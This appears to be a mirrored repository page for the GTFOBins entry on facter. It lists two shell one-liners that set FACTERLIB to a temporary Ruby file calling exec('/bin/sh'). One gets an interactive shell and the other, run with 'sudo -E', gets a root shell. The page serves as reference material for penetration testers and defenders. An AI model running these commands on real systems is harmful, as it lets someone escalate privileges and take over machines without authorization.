This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-11 09:51:33 +01:00
Code
Issues
8eaf595fe6
GTFOBins.github.io
/
_gtfobins
/
facter.md
Andrea Cardaci
aab8e783ec
Add facter
...
Thanks to
#20
.
2018-09-04 13:42:37 +02:00
284 B
Raw
Blame
History
functions
execute-interactive
sudo-enabled
code
TF=$(mktemp -d) echo 'exec("/bin/sh")' > $TF/x.rb FACTERLIB=$TF facter
code
TF=$(mktemp -d) echo 'exec("/bin/sh")' > $TF/x.rb FACTERLIB=$TF sudo -E facter